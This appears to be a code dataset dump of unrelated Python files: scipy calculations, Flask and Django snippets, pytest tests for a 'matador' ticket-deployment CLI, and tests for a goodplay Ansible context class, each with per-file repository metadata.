| 38.333333 | 141 | 0.508681 | 4,715 | 35,075 | 3.741039 | 0.067656 | 0.034016 | 0.020409 | 0.036283 | 0.806848 | 0.791598 | 0.7734 | 0.769658 | 0.75078 | 0.740461 | 0 | 0.075945 | 0.320884 | 35,075 | 914 | 142 | 38.375274 | 0.664568 | 0.519116 | 0 | 0.456338 | 0 | 0 | 0.085435 | 0.00138 | 0 | 0 | 0 | 0 | 0.011268 | 1 | 0.03662 | false | 0 | 0.019718 | 0 | 0.140845 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e3bc30c5ea25fdafb92d69479017da854fab5fcc | 611 | py | Python | testr.py | Azizimj/GTSPbnd | 5baa0935ed42d83a3b87cce6b103beb0e31fda08 | [
"Apache-2.0"
] | null | null | null | testr.py | Azizimj/GTSPbnd | 5baa0935ed42d83a3b87cce6b103beb0e31fda08 | [
"Apache-2.0"
] | null | null | null | testr.py | Azizimj/GTSPbnd | 5baa0935ed42d83a3b87cce6b103beb0e31fda08 | [
"Apache-2.0"
] | null | null | null | def cal_c():
from scipy.stats import mvn
import numpy as np
low = np.array([0, 0])
upp = np.array([1, 1])
mu = np.array([.5, .5])
S = np.array([[1, 0],[0, 1]])
p, i = mvn.mvnun(low, upp, mu, S)
print(p, i)
low = np.array([0, 0])
upp = np.array([1, 1])
mu = np.array([.5, .5])
S = np.array([[.1, 0], [0, 0.1]])
p, i = mvn.mvnun(low, upp, mu, S)
print(p, i)
low = np.array([-.5, -.5])
upp = np.array([.5, .5])
mu = np.array([0, 0])
S = np.array([[1, 0], [0, 1]])
p, i = mvn.mvnun(low, upp, mu, S)
print(p, i)
return p
cal_c() | 22.62963 | 37 | 0.454992 | 116 | 611 | 2.37931 | 0.206897 | 0.304348 | 0.144928 | 0.130435 | 0.706522 | 0.706522 | 0.706522 | 0.706522 | 0.706522 | 0.706522 | 0 | 0.071926 | 0.294599 | 611 | 27 | 38 | 22.62963 | 0.568445 | 0 | 0 | 0.608696 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.086957 | 0 | 0.173913 | 0.130435 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e3caea1542ffd88b83c015de2eee8a1f334140d9 | 19 | py | Python | tempCodeRunnerFile.py | albertwdl/ML1DGAN | 6ce4933f0324cc978657e2bc4fe51d89f9e8ce76 | [
"MIT"
] | null | null | null | tempCodeRunnerFile.py | albertwdl/ML1DGAN | 6ce4933f0324cc978657e2bc4fe51d89f9e8ce76 | [
"MIT"
] | null | null | null | tempCodeRunnerFile.py | albertwdl/ML1DGAN | 6ce4933f0324cc978657e2bc4fe51d89f9e8ce76 | [
"MIT"
] | null | null | null | '--batchSize','100' | 19 | 19 | 0.631579 | 2 | 19 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.157895 | 0 | 19 | 1 | 19 | 19 | 0.473684 | 0 | 0 | 0 | 0 | 0 | 0.7 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
54054fa61dbdf413ff7491cb8c88131f987f7981 | 64 | py | Python | multilingual_t5/baseline_gu/__init__.py | sumanthd17/mt5 | c99b4e3ad1c69908c852c730a1323ccb52d48f58 | [
"Apache-2.0"
] | null | null | null | multilingual_t5/baseline_gu/__init__.py | sumanthd17/mt5 | c99b4e3ad1c69908c852c730a1323ccb52d48f58 | [
"Apache-2.0"
] | null | null | null | multilingual_t5/baseline_gu/__init__.py | sumanthd17/mt5 | c99b4e3ad1c69908c852c730a1323ccb52d48f58 | [
"Apache-2.0"
] | null | null | null | """baseline_gu dataset."""
from .baseline_gu import BaselineGu
| 16 | 35 | 0.765625 | 8 | 64 | 5.875 | 0.75 | 0.425532 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.109375 | 64 | 3 | 36 | 21.333333 | 0.824561 | 0.3125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
541c7336841139594435890510491a358cad17ec | 109 | py | Python | routes/validate_upload.py | eHattori/Flask-Model-Architecture | a2a1c2140a30cdf543654d6941eb9ab5df2eddd6 | [
"MIT"
] | null | null | null | routes/validate_upload.py | eHattori/Flask-Model-Architecture | a2a1c2140a30cdf543654d6941eb9ab5df2eddd6 | [
"MIT"
] | null | null | null | routes/validate_upload.py | eHattori/Flask-Model-Architecture | a2a1c2140a30cdf543654d6941eb9ab5df2eddd6 | [
"MIT"
] | null | null | null | from . import routes
@routes.route('/validateUpload/hello')
def hello():
return 'Hello Validate Order'
| 15.571429 | 38 | 0.715596 | 13 | 109 | 6 | 0.769231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.155963 | 109 | 6 | 39 | 18.166667 | 0.847826 | 0 | 0 | 0 | 0 | 0 | 0.376147 | 0.192661 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.25 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
58194b62fe2d94561c5e375867074f92ef3053d5 | 41 | py | Python | ip3country/__init__.py | statsig-io/ip3country-py | fdaa3267fc54cb589f097dff3e6fab364686d229 | [
"0BSD"
] | null | null | null | ip3country/__init__.py | statsig-io/ip3country-py | fdaa3267fc54cb589f097dff3e6fab364686d229 | [
"0BSD"
] | null | null | null | ip3country/__init__.py | statsig-io/ip3country-py | fdaa3267fc54cb589f097dff3e6fab364686d229 | [
"0BSD"
] | null | null | null | from .country_lookup import CountryLookup | 41 | 41 | 0.902439 | 5 | 41 | 7.2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.073171 | 41 | 1 | 41 | 41 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
581c16fd2ffaa69dc48d435ae4253765da89c296 | 7,929 | py | Python | tests/cli/test_commands.py | meatballs/python_utils | 7e7ab9856c6dee95bdede03ab1784bda179e3b1c | [
"MIT"
] | null | null | null | tests/cli/test_commands.py | meatballs/python_utils | 7e7ab9856c6dee95bdede03ab1784bda179e3b1c | [
"MIT"
] | null | null | null | tests/cli/test_commands.py | meatballs/python_utils | 7e7ab9856c6dee95bdede03ab1784bda179e3b1c | [
"MIT"
] | 1 | 2016-02-05T13:43:03.000Z | 2016-02-05T13:43:03.000Z | import os
from click.testing import CliRunner
import matador.cli.commands as cmd
import globals as gbl
from pathlib import Path
def test_init(tmpdir):
project_folder = Path(str(tmpdir), gbl.project)
os.chdir(tmpdir)
runner = CliRunner()
result = runner.invoke(
cmd.matador, ['init', '-p', gbl.project])
result.exit_code == 0
assert result.output == (
f'Created matador project {gbl.project}\n')
assert Path(project_folder, 'src').exists()
def test_create_ticket(project_repo):
test_ticket = 'test-ticket'
runner = CliRunner()
result = runner.invoke(
cmd.matador, ['create-ticket', '--ticket', test_ticket])
assert result.exit_code == 0
assert result.output == f'Created ticket {test_ticket}\n'
ticket_folder = Path(project_repo.path, 'deploy', 'tickets', test_ticket)
deploy_file = Path(ticket_folder, 'deploy.py')
remove_file = Path(ticket_folder, 'remove.py')
assert ticket_folder.exists()
assert deploy_file.exists()
assert remove_file.exists()
last_commit = project_repo.get_object(project_repo.head())
commit_message = last_commit.message
expected_message = bytes(f'Create ticket {test_ticket}', encoding='UTF-8')
assert commit_message == expected_message
def test_create_package(project_repo):
test_package = 'test-package'
runner = CliRunner()
result = runner.invoke(
cmd.matador, ['create-package', '--package', test_package])
assert result.exit_code == 0
assert result.output == f'Created package {test_package}\n'
package_folder = Path(
project_repo.path, 'deploy', 'packages', test_package)
package_file = Path(package_folder, 'tickets.yml')
remove_file = Path(package_folder, 'remove.py')
assert package_folder.exists()
assert package_file.exists()
assert remove_file.exists()
last_commit = project_repo.get_object(project_repo.head())
commit_message = last_commit.message
expected_message = bytes(
'Create package %s' % test_package, encoding='UTF-8')
assert commit_message == expected_message
def test_add_ticket_to_package(project_repo):
test_ticket = 'test-ticket'
test_package = 'test-package'
package_folder = Path(
project_repo.path, 'deploy', 'packages', test_package)
Path.mkdir(package_folder, parents=True)
tickets_file = Path(package_folder, 'tickets.yml')
tickets_file.touch()
runner = CliRunner()
result = runner.invoke(
cmd.matador, ['add-t2p', '-t', test_ticket, '-p', test_package])
assert result.exit_code == 0
assert result.output == (
f'Added ticket {test_ticket} to package {test_package}\n')
with tickets_file.open('r') as f:
tickets = f.readlines()
assert f'- {test_ticket}\n' in tickets
def test_deploy_ticket(project_repo):
env = 'test'
test_ticket = 'test-ticket'
ticket_folder = Path(project_repo.path, 'deploy', 'tickets', test_ticket)
deploy_file = Path(ticket_folder, 'deploy.py')
ticket_folder.mkdir(parents=True)
deploy_file.touch()
with deploy_file.open('w') as f:
f.write('import click\n\n')
f.write('click.echo("Test Message")\n')
deploy_path = str(deploy_file.relative_to(project_repo.path))
project_repo.stage([bytes(deploy_path, encoding='UTF-8')])
project_repo.do_commit(message=b'Create test ticket')
runner = CliRunner()
result = runner.invoke(
cmd.matador, [
'deploy-ticket', '-e', env, '-t', test_ticket, '-c', 'HEAD'])
assert result.exit_code == 0
assert result.output == (
f'Deploying ticket {test_ticket} to {env}\nTest Message\n')
def test_remove_ticket(project_repo):
env = 'test'
test_ticket = 'test-ticket'
ticket_folder = Path(project_repo.path, 'deploy', 'tickets', test_ticket)
deploy_file = Path(ticket_folder, 'remove.py')
ticket_folder.mkdir(parents=True)
deploy_file.touch()
with deploy_file.open('w') as f:
f.write('import click\n\n')
f.write('click.echo("Test Message")\n')
deploy_path = str(deploy_file.relative_to(project_repo.path))
project_repo.stage([bytes(deploy_path, encoding='UTF-8')])
project_repo.do_commit(message=b'Create test ticket')
runner = CliRunner()
result = runner.invoke(
cmd.matador, [
'remove-ticket', '-e', env, '-t', test_ticket, '-c', 'HEAD'])
assert result.exit_code == 0
assert result.output == (
f'Removing ticket {test_ticket} from {env}\nTest Message\n')
def test_deploy_package(project_repo):
env = 'test'
package = 'test_package'
package_folder = Path(project_repo.path, 'deploy', 'packages', package)
package_file = Path(package_folder, 'tickets.yml')
package_folder.mkdir(parents=True)
package_file.touch()
for ticket in ('test-ticket-1', 'test-ticket-2'):
ticket_folder = Path(project_repo.path, 'deploy', 'tickets', ticket)
deploy_file = Path(ticket_folder, 'deploy.py')
ticket_folder.mkdir(parents=True)
deploy_file.touch()
with deploy_file.open('w') as f:
f.write('import click\n\n')
f.write(f'click.echo("Test Message from {ticket}")\n')
with package_file.open('a') as f:
f.write(f'- {ticket}\n')
ticket_path = str(deploy_file.relative_to(project_repo.path))
project_repo.stage([bytes(ticket_path, encoding='UTF-8')])
package_path = str(package_file.relative_to(project_repo.path))
project_repo.stage([bytes(package_path, encoding='UTF-8')])
project_repo.do_commit(message=b'Create test package')
runner = CliRunner()
result = runner.invoke(
cmd.matador, [
'deploy-package', '-e', env, '-p', package, '-c', 'HEAD'])
assert result.exit_code == 0
expected_output = (
f'Deploying package {package} to {env}\n'
'*************************\n'
f'Deploying ticket test-ticket-1 to {env}\n'
'Test Message from test-ticket-1\n\n'
'*************************\n'
f'Deploying ticket test-ticket-2 to {env}\n'
'Test Message from test-ticket-2\n\n'
)
assert result.output == expected_output
def test_remove_package(project_repo):
env = 'test'
package = 'test_package'
package_folder = Path(project_repo.path, 'deploy', 'packages', package)
package_file = Path(package_folder, 'tickets.yml')
package_folder.mkdir(parents=True)
package_file.touch()
for ticket in ('test-ticket-1', 'test-ticket-2'):
ticket_folder = Path(project_repo.path, 'deploy', 'tickets', ticket)
deploy_file = Path(ticket_folder, 'deploy.py')
ticket_folder.mkdir(parents=True)
deploy_file.touch()
with deploy_file.open('w') as f:
f.write('import click\n\n')
f.write(f'click.echo("Test Message from {ticket}")\n')
with package_file.open('a') as f:
f.write(f'- {ticket}\n')
ticket_path = str(deploy_file.relative_to(project_repo.path))
project_repo.stage([bytes(ticket_path, encoding='UTF-8')])
package_path = str(package_file.relative_to(project_repo.path))
project_repo.stage([bytes(package_path, encoding='UTF-8')])
project_repo.do_commit(message=b'Create test package')
runner = CliRunner()
result = runner.invoke(
cmd.matador, [
'remove-package', '-e', env, '-p', package, '-c', 'HEAD'])
assert result.exit_code == 0
expected_output = (
f'Removing package {package} from {env}\n'
'*************************\n'
f'Removing ticket test-ticket-1 from {env}\n'
'Test Message from test-ticket-1\n\n'
'*************************\n'
f'Removing ticket test-ticket-2 from {env}\n'
'Test Message from test-ticket-2\n\n'
)
assert result.output == expected_output
| 34.624454 | 78 | 0.649136 | 1,040 | 7,929 | 4.761538 | 0.0875 | 0.079968 | 0.045436 | 0.038166 | 0.830372 | 0.820477 | 0.787561 | 0.749192 | 0.731826 | 0.701939 | 0 | 0.00459 | 0.203178 | 7,929 | 228 | 79 | 34.776316 | 0.779202 | 0 | 0 | 0.697802 | 0 | 0 | 0.216042 | 0.013621 | 0 | 0 | 0 | 0 | 0.137363 | 1 | 0.043956 | false | 0 | 0.049451 | 0 | 0.093407 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
58a67002b35d55f710d0a91fd40c12f31b6e05ac | 140 | py | Python | accounts/admin.py | ankitmlive/prolab-api | 8e86e222269b63108cd33f08a90b2d921a1152f6 | [
"MIT"
] | null | null | null | accounts/admin.py | ankitmlive/prolab-api | 8e86e222269b63108cd33f08a90b2d921a1152f6 | [
"MIT"
] | 5 | 2021-03-30T12:47:27.000Z | 2021-09-22T18:38:27.000Z | accounts/admin.py | ankitmlive/prolab-api | 8e86e222269b63108cd33f08a90b2d921a1152f6 | [
"MIT"
] | 1 | 2020-03-16T14:42:31.000Z | 2020-03-16T14:42:31.000Z | from django.contrib import admin
#from django.contrib.auth.admin import UserAdmin
from .models import ProUser
admin.site.register(ProUser)
| 23.333333 | 48 | 0.828571 | 20 | 140 | 5.8 | 0.55 | 0.172414 | 0.293103 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 140 | 5 | 49 | 28 | 0.920635 | 0.335714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
54982d848dc616af818bafe683b651a66447d349 | 94 | py | Python | algorithm/__init__.py | Opeyem1a/flight-path-optimizer | eb4285ed867f22163182789050131ec625889578 | [
"MIT"
] | null | null | null | algorithm/__init__.py | Opeyem1a/flight-path-optimizer | eb4285ed867f22163182789050131ec625889578 | [
"MIT"
] | null | null | null | algorithm/__init__.py | Opeyem1a/flight-path-optimizer | eb4285ed867f22163182789050131ec625889578 | [
"MIT"
] | null | null | null | from .flight_optimizer import FlightOptimizer
from .flight_noptimizer import FlightNoptimizer
| 31.333333 | 47 | 0.893617 | 10 | 94 | 8.2 | 0.7 | 0.243902 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085106 | 94 | 2 | 48 | 47 | 0.953488 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
49b4553dcd0af9a77863ad54273a65597047da9b | 37 | py | Python | pi_gpio_api/__init__.py | jcapona/pi-gpio-api | 26934ffb9d11d4ad226ee39df294f7606836261f | [
"MIT"
] | null | null | null | pi_gpio_api/__init__.py | jcapona/pi-gpio-api | 26934ffb9d11d4ad226ee39df294f7606836261f | [
"MIT"
] | null | null | null | pi_gpio_api/__init__.py | jcapona/pi-gpio-api | 26934ffb9d11d4ad226ee39df294f7606836261f | [
"MIT"
] | null | null | null | from pi_gpio_api.core.app import app
| 18.5 | 36 | 0.837838 | 8 | 37 | 3.625 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108108 | 37 | 1 | 37 | 37 | 0.878788 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
49e2b409c13d9eab61e338b60a4af0a142de4b12 | 9,358 | py | Python | tests/test_context.py | goodplay/goodplay | dad71b2e2a27d2dc4ba8ce76ae2f927dda83daca | [
"Apache-2.0"
] | 16 | 2016-03-16T12:20:49.000Z | 2020-04-17T15:31:54.000Z | tests/test_context.py | goodplay/goodplay | dad71b2e2a27d2dc4ba8ce76ae2f927dda83daca | [
"Apache-2.0"
] | 290 | 2016-02-26T06:49:32.000Z | 2022-03-18T08:32:25.000Z | tests/test_context.py | goodplay/goodplay | dad71b2e2a27d2dc4ba8ce76ae2f927dda83daca | [
"Apache-2.0"
] | 9 | 2016-01-20T20:55:44.000Z | 2020-11-04T03:51:03.000Z | # -*- coding: utf-8 -*-
from goodplay.ansible_support import Inventory, Playbook
from goodplay.context import GoodplayContext
# inventory_path
def test_inventory_path_file_found_in_playbook_path_dir(tmpdir):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
inventory_path = tmpdir.join('inventory')
inventory_path.ensure()
ctx = GoodplayContext(playbook_path)
assert ctx.inventory_path == inventory_path
def test_inventory_path_dir_found_in_playbook_path_dir(tmpdir):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
inventory_path = tmpdir.join('inventory')
inventory_path.ensure(dir=True)
ctx = GoodplayContext(playbook_path)
assert ctx.inventory_path == inventory_path
def test_inventory_path_is_none_when_not_in_playbook_path_dir(tmpdir):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
assert ctx.inventory_path is None
def test_inventory_path_is_none_when_inventory_path_in_parent_dir(tmpdir):
playbook_path = tmpdir.join('parent_dir', 'test_playbook.yml')
playbook_path.ensure()
inventory_path = tmpdir.join('inventory')
inventory_path.ensure()
ctx = GoodplayContext(playbook_path)
assert ctx.inventory_path is None
def test_inventory_path_is_none_when_inventory_path_in_sub_dir(tmpdir):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
inventory_path = tmpdir.join('sub_dir', 'inventory')
inventory_path.ensure()
ctx = GoodplayContext(playbook_path)
assert ctx.inventory_path is None
def test_inventory_path_is_cached(tmpdir):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
inventory_path = tmpdir.join('inventory')
inventory_path.ensure()
ctx = GoodplayContext(playbook_path)
first_result = ctx.inventory_path
assert first_result is not None
assert id(ctx.inventory_path) == id(first_result)
# inventory
def test_inventory_is_none_when_inventory_path_is_none(tmpdir):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
ctx.inventory_path = None
assert ctx.inventory is None
def test_inventory_class(tmpdir):
inventory_path = tmpdir.join('inventory')
inventory_path.write('host1', ensure=True)
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
assert ctx.inventory.__class__ == Inventory
def test_inventory_is_cached(tmpdir):
inventory_path = tmpdir.join('inventory')
inventory_path.write('host1', ensure=True)
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
first_result = ctx.inventory
assert first_result is not None
assert id(ctx.inventory) == id(first_result)
# playbook_dir_path
def test_playbook_dir_path_is_playbook_path_directory(tmpdir):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
assert ctx.playbook_dir_path == tmpdir
def test_playbook_dir_path_is_cached(tmpdir):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
first_result = ctx.playbook_dir_path
assert first_result is not None
assert id(ctx.playbook_dir_path) == id(first_result)
# playbook
def test_playbook_is_none_when_inventory_path_is_none(tmpdir):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
ctx.inventory_path = None
assert ctx.playbook is None
def test_playbook_class(tmpdir):
inventory_path = tmpdir.join('inventory')
inventory_path.write('host1', ensure=True)
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.write('''---
- hosts: host1
tasks:
- name: task 1
ping:
tags: test
''', ensure=True)
ctx = GoodplayContext(playbook_path)
assert ctx.playbook.__class__ == Playbook
def test_playbook_is_cached(tmpdir):
inventory_path = tmpdir.join('inventory')
inventory_path.write('host1', ensure=True)
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.write('''---
- hosts: host1
tasks:
- name: task 1
ping:
tags: test
''', ensure=True)
ctx = GoodplayContext(playbook_path)
first_result = ctx.playbook
assert first_result is not None
assert id(ctx.playbook) == id(first_result)
# role_path
def test_role_path_is_none_when_plain_test_playbook(tmpdir):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
assert ctx.role_path is None
def test_role_path_is_none_when_tests_parent_dir_only(tmpdir):
playbook_path = tmpdir.join('tests', 'test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
assert ctx.role_path is None
def test_role_path_is_none_when_meta_dir_beside_tests_parent_dir_only(tmpdir):
tmpdir.join('meta').ensure(dir=True)
playbook_path = tmpdir.join('tests', 'test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
assert ctx.role_path is None
def test_role_path_is_none_when_meta_dir_with_main_yml_dir_beside_tests_parent_dir(tmpdir):
tmpdir.join('meta', 'main.yml').ensure(dir=True)
playbook_path = tmpdir.join('tests', 'test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
assert ctx.role_path is None
def test_role_path_is_none_when_meta_dir_with_main_yml_file_beside_playbook_path_dir(tmpdir):
tmpdir.join('meta', 'main.yml').ensure()
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
assert ctx.role_path is None
def test_role_path_when_meta_dir_with_main_yml_file_beside_tests_parent_dir(tmpdir):
tmpdir.join('meta', 'main.yml').ensure()
playbook_path = tmpdir.join('tests', 'test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
assert ctx.role_path == tmpdir
def test_role_path_when_meta_dir_with_main_yml_file_beside_tests_ancestor_dir(tmpdir):
tmpdir.join('meta', 'main.yml').ensure()
playbook_path = tmpdir.join('tests', 'sub_dir1', 'sub_dir2', 'test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
assert ctx.role_path == tmpdir
def test_role_path_is_cached(tmpdir):
tmpdir.join('meta', 'main.yml').ensure()
playbook_path = tmpdir.join('tests', 'test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
first_result = ctx.role_path
assert first_result is not None
assert id(ctx.role_path) == id(first_result)
# is_role_playbook
def test_is_role_playbook_is_false_when_role_path_is_none(tmpdir):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
ctx.role_path = None
assert ctx.is_role_playbook is False
def test_is_role_playbook_is_true_when_role_path_is_not_none(tmpdir):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
ctx.role_path = tmpdir
assert ctx.is_role_playbook is True
# compose_project_name
def test_compose_project_name_is_same_for_playbook_path_and_environment(tmpdir):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
assert ctx.compose_project_name('env1') == ctx.compose_project_name('env1')
def test_compose_project_name_incorporates_node_id(tmpdir, monkeypatch):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
compose_project_name1 = ctx.compose_project_name('env1')
monkeypatch.setattr('uuid.getnode', lambda: 1234)
compose_project_name2 = ctx.compose_project_name('env1')
assert compose_project_name1 != compose_project_name2
def test_compose_project_name_incorporates_playbook_path(tmpdir):
playbook_path1 = tmpdir.join('dir1', 'test_playbook.yml')
playbook_path1.ensure()
playbook_path2 = tmpdir.join('dir2', 'test_playbook.yml')
playbook_path2.ensure()
ctx1 = GoodplayContext(playbook_path1)
ctx2 = GoodplayContext(playbook_path2)
assert ctx1.compose_project_name('env1') != ctx2.compose_project_name('env1')
def test_compose_project_name_incorporates_environment(tmpdir):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
assert ctx.compose_project_name('env1') != ctx.compose_project_name('env2')
# release
def test_release_removes_temp_dir_paths(tmpdir):
playbook_path = tmpdir.join('test_playbook.yml')
playbook_path.ensure()
ctx = GoodplayContext(playbook_path)
temp_dir_path = ctx._create_temp_dir_path()
assert temp_dir_path.check(dir=True)
assert len(ctx._temp_dir_paths) == 1
ctx.release()
assert not temp_dir_path.check()
assert len(ctx._temp_dir_paths) == 0
| 25.708791 | 93 | 0.751229 | 1,249 | 9,358 | 5.247398 | 0.071257 | 0.166616 | 0.079036 | 0.105279 | 0.849252 | 0.803326 | 0.759536 | 0.749771 | 0.743668 | 0.743668 | 0 | 0.005165 | 0.151742 | 9,358 | 363 | 94 | 25.779614 | 0.820484 | 0.013785 | 0 | 0.639423 | 0 | 0 | 0.10218 | 0 | 0 | 0 | 0 | 0 | 0.177885 | 1 | 0.139423 | false | 0 | 0.009615 | 0 | 0.149038 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
49fb5f45ee328b02a4c7a2dd3cd1ac7601f5e594 | 36 | py | Python | smart_home_hub/device/devices/roku/__init__.py | rsmith49/smart_home_hub | 36c8d07feecfb0166f0125585e109b1b357c4519 | [
"Apache-2.0"
] | null | null | null | smart_home_hub/device/devices/roku/__init__.py | rsmith49/smart_home_hub | 36c8d07feecfb0166f0125585e109b1b357c4519 | [
"Apache-2.0"
] | null | null | null | smart_home_hub/device/devices/roku/__init__.py | rsmith49/smart_home_hub | 36c8d07feecfb0166f0125585e109b1b357c4519 | [
"Apache-2.0"
] | null | null | null | from .roku_device import RokuDevice
